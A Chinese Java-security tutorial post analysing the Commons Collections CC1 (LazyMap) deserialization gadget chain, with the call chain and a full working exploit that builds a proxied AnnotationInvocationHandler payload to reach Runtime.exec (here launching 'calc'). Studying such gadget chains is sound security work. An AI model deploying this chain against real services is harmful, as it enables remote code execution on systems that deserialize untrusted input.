javaSec cc1 链

,

前面我们已经讲过了CC链1的核心ChainedTransformer的transform链
LazyMap这条链是来自yso cc1 所使用的链子,对于新手来说分析起来还是困难,建议先从p牛那条分析起

本条链调用流程:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
/*
	Gadget chain:
		ObjectInputStream.readObject()
			AnnotationInvocationHandler.readObject()
				Map(Proxy).entrySet()
					AnnotationInvocationHandler.invoke()
						LazyMap.get()
							ChainedTransformer.transform()
								ConstantTransformer.transform()
								InvokerTransformer.transform()
									Method.invoke()
										Class.getMethod()
								InvokerTransformer.transform()
									Method.invoke()
										Runtime.getRuntime()
								InvokerTransformer.transform()
									Method.invoke()
										Runtime.exec()

	Requires:
		commons-collections
 */

可以看到LazyMap存在一个对mapput操作
|550

然后找到一个调用这个get方法的类
AnnotationInvocationHandler invoke方法有存在,而且是一个需要代理的方法,我们只需要通过动态代理去触发这个invoke方法即可

EXP:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
package cc1;  
  
import org.apache.commons.collections.Transformer;  
import org.apache.commons.collections.functors.ChainedTransformer;  
import org.apache.commons.collections.functors.ConstantTransformer;  
import org.apache.commons.collections.functors.InvokerTransformer;  
import org.apache.commons.collections.map.LazyMap;  
  
import java.io.*;  
import java.lang.reflect.*;  
import java.util.HashMap;  
import java.util.Map;  
  
public class Main {  
    public static void main(String[] args) throws NoSuchMethodException, InvocationTargetException, IllegalAccessException, ClassNotFoundException, InstantiationException, IOException {  
      Transformer[] transformers=  new Transformer[]{  
              new ConstantTransformer(Runtime.class),  
            new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",null}),  
            new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,null}),  
            new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})  
  
        };  
//       将多个Transformer组合成一个Transformer  
        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);  
        HashMap<Object, Object> hashMap = new HashMap<>();  
        Map decorateMap = LazyMap.decorate(hashMap, chainedTransformer);  
        // 拿到AnnotationInvocationHandler 类  
        Class<?> claaz = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");  
        Constructor<?> declaredConstructor = claaz.getDeclaredConstructor(Class.class, Map.class);  
        declaredConstructor.setAccessible(true);  
        // 通过反射创建AnnotationInvocationHandler对象  
        InvocationHandler invocationHandler = (InvocationHandler)declaredConstructor.newInstance(Override.class, decorateMap);  
  
        //代理类  
        Map proxyMap = (Map)Proxy.newProxyInstance(ClassLoader.getSystemClassLoader(), new Class[]{Map.class}, invocationHandler);  
        invocationHandler= (InvocationHandler)declaredConstructor.newInstance(Override.class,proxyMap);  
        serialize(invocationHandler);  
        deserialize("ser.bin");  
    }  
  
    public static void serialize(Object obj) throws IOException {  
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));  
        oos.writeObject(obj);  
    }  
    // 反序列化入口  
  
    public static void deserialize(String fileName) throws IOException, ClassNotFoundException {  
        ObjectInputStream ois = new ObjectInputStream(new FileInputStream(fileName));  
        ois.readObject();  
    }  
}

参考:

Java安全 CC链1分析(Lazymap类) - FreeBuf网络安全行业门户